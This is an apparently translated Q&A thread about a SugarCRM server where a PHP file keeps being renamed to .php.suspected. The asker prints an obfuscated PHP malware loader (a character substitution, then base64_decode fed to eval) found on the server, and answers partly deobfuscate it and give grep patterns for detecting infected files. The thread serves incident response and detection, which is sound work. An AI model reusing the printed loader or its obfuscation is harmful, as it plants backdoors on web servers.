自过去4天以来,我们的生产服务器(AWS EC2实例)面临着一个奇怪的问题,该问题仅针对一个SugarCRM网站。
问题是 /home/site_folder/public_html/include/MassUpdate.php 文件自动重命名为 /home/site_folder/public_html/include/MassUpdate.php.suspected
这种情况一天发生2-3次,间隙为3-4小时。仅在特定站点的情况下才会出现此问题,即使对于同一站点的暂存副本也不会发生此问题。我甚至从两个站点都检查了该文件的代码,它是一样的。
我们使用Google搜索并发现,此问题主要发生在Wordpress网站上,可能是因为攻击。但我们检查了我们的服务器对抗攻击,没有任何。此外,服务器上没有运行病毒/恶意软件扫描。
我们该怎么做?
更新
经过这个link后我们发现了一些事情。
我们执行了egrep -Rl 'function.*for.*strlen.*isset' /home/username/public_html/
并发现包含以下示例代码的文件很少。
<?php
function flnftovr($hkbfqecms, $bezzmczom){$ggy = ''; for($i=0; $i < strlen($hkbfqecms); $i++){$ggy .= isset($bezzmczom[$hkbfqecms[$i]]) ? $bezzmczom[$hkbfqecms[$i]] : $hkbfqecms[$i];}
$ixo="base64_decode";return $ixo($ggy);}
$s = 'DMtncCPWxODe8uC3hgP3OuEKx3hjR5dCy56kT6kmcJdkOBqtSZ91NMP1OuC3hgP3h3hjRamkT6kmcJdkOBqtSZ91NJV'.
'0OuC0xJqvSMtKNtPXcJvt8369GZpsZpQWxOlzSMtrxCPjcJvkSZ96byjbZgtgbMtWhuCXbZlzHXCoCpCob'.'zxJd7Nultb4qthgtfNMtixo9phgCWbopsZ1X=';
$koicev = Array('1'=>'n', '0'=>'4', '3'=>'y', '2'=>'8', '5'=>'E', '4'=>'H', '7'=>'j', '6'=>'w', '9'=>'g', '8'=>'J', 'A'=>'Y', 'C'=>'V', 'B'=>'3', 'E'=>'x', 'D'=>'Q', 'G'=>'M', 'F'=>'i', 'I'=>'P', 'H'=>'U', 'K'=>'v', 'J'=>'W', 'M'=>'G', 'L'=>'L', 'O'=>'X', 'N'=>'b', 'Q'=>'B', 'P'=>'9', 'S'=>'d', 'R'=>'I', 'U'=>'r', 'T'=>'O', 'W'=>'z', 'V'=>'F', 'Y'=>'q', 'X'=>'0', 'Z'=>'C', 'a'=>'D', 'c'=>'a', 'b'=>'K', 'e'=>'o', 'd'=>'5', 'g'=>'m', 'f'=>'h', 'i'=>'6', 'h'=>'c', 'k'=>'p', 'j'=>'s', 'm'=>'A', 'l'=>'R', 'o'=>'S', 'n'=>'u', 'q'=>'N', 'p'=>'k', 's'=>'7', 'r'=>'t', 'u'=>'2', 't'=>'l', 'w'=>'e', 'v'=>'1', 'y'=>'T', 'x'=>'Z', 'z'=>'f');
eval(flnftovr($s, $koicev));?>
似乎有些恶意软件,我们如何永久删除它?
由于
答案 0 :(得分:2)
它有点混淆,但我已经去混淆了它。函数flnftovr接受一个字符串和一个数组作为参数。它使用公式
创建一个新字符串$ ggyisset($array[$string[$i]]) ? $array[$string[$i]] : $string[$i];}
然后将base64_decode预先添加到字符串中。
字符串是$ s,数组是$ koicev。然后它会破坏这种操纵的结果。所以最终会创建一个字符串:
base64_decode(QGluaV9zZXQoJ2Vycm9yX2xvZycsIE5VTEwpOwpAaW5pX3NldCgnbG9nX2Vycm9ycycsIDApOwpAaW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywgMCk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmlmKGlzc2V0KCRfU0VSVkVSKfZW5jb2RlKHNlcmlhbGl6ZSgkcmVzKSk7Cn0=)
那么实际上在您的服务器上运行的是:
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
if(isset($_SERVER)
encode(serialize($res));
}
如果您没有创建此内容并且您怀疑自己的网站遭到入侵,我建议您擦除服务器,并为服务器上运行的任何应用程序创建新安装。
答案 1 :(得分:1)
.php
文件重命名为.php.suspected
的今天一直在发生。以下命令不应该包含某些内容:
find <web site root> -name '*.suspected' -print
find <web site root> -name '.*.ico' -print
就我而言,可以使用以下命令找到受感染的文件:
cd <web site root>
egrep -Rl '\$GLOBALS.*\\x'
egrep -Rl -Ezo '/\*(\w+)\*/\s*@include\s*[^;]+;\s*/\*'
egrep -Rl -E '^.+(\$_COOKIE|\$_POST).+eval.+$'
我已经在GitHub上对该问题以及如何处理进行了更详细的描述。
答案 2 :(得分:0)
发布此答案,可能对其他人有帮助。
#Rename your_file_name.php.suspected to your_file_name.php
mv /<path_to_your_file>/your_file_name.php.suspected /<path_to_your_file>/your_file_name.php
*/10 * * * * path_to_cron_file.sh
您将获得有关在Google上创建cron的大量文档。
答案 3 :(得分:0)
将php文件重命名为 php.suspected 通常是由黑客的脚本来完成的。他们更改了文件扩展名,给人的印象是该文件已由某些反恶意软件软件检查过,安全且无法执行。但是,实际上不是。他们想随时调用脚本将扩展名更改为“ php”,然后,将扩展名更改回“可疑”。 您可以在Securi Research Labs
上了解它这则帖子可能很旧,但话题仍然存在。特别是根据June 2019 malware campaign targeting WordPress plugins。我在客户的WordPress子目录中找到了一些“可疑”文件(例如wp-content)